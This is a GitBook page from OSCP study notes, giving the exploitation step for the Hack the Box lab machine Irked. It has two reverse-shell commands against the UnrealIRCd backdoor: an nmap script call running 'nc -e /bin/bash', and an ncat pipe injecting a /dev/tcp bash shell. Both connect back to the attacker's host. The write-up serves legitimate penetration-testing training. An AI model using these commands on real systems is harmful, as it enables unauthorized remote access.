📗
OSCP Prep
  • OSCP Preperation
  • Hack the Box Linux
    • Bashed
    • Nibbles
    • Sense
    • Conceal
    • La Casa de Papel
    • Lightweight
    • Jerry
      • Scanning and Enumeration
    • Jarvis
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lesson's Learned
    • TartarSauce
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Poison
      • Turning LFI into RFI
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Node(Comeback to)
      • Scanning and Enumeration
      • Exploitation
    • SolidState
      • Scanning and Enumeration
      • Exploitation and POSTY
      • Lessons Learned
    • Nineveh
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons learned
    • Cronos
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • SwagShop
      • Scanning and Enumeration
      • Exploitation
      • Lessons Learned
    • Networked
      • Exploitation
    • FriendZoned
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons learned
    • Sunday
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Valentine
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Irked
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Kotarak
    • Nibbles
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
  • Hack the Box Windows
    • Bounty
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
    • Blue
      • Scanning and Enumeration
      • Lessons Learned
    • Granny
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Grandpa
      • Scanning and Enumeration
      • Exploitation
      • Lessons Learned
    • Arctic
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Optimum
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Devel
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
    • Legacy (comeback to )
      • Scanning and Enumeration
      • Exploitation
  • Slick Tricks
    • Banned by Bruteforce? Try this!
    • Hydra for Web Logins
    • Grepping
    • Redirecting all Script Traffic to Burp
    • Word Count
    • Reverse Shell Tricks
    • Transfering files
  • Nmap Help
  • Linux Guide
    • Linux Shortcuts
  • Privelege Escalation
    • Linux Privilege Escalation
Powered by GitBook
On this page
  • Method 1
  • Method two

Was this helpful?

  1. Hack the Box Linux
  2. Irked

Exploitation

PreviousScanning and EnumerationNextPost Exploitation

Last updated 4 years ago

Was this helpful?

Method 1

Set up your nc listener and run the following script on nmap 

nmap -p 6697 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.28 4444"  10.10.10.117

Method two

We can manually exploit by gaining access to the system with ncat. 

echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.28/1234 0>&1' " | ncat 10.10.10.117 6697
Logoirc-unrealircd-backdoor NSE script &emdash; Nmap Scripting Engine documentation
LogoRFC 1459 - Internet Relay Chat Protocol
LogoA backdoor in UnrealIRCdlwnnet
Connection Established!
We get a response from IRC via ping as shown on the left hand side, vulnerable to command execution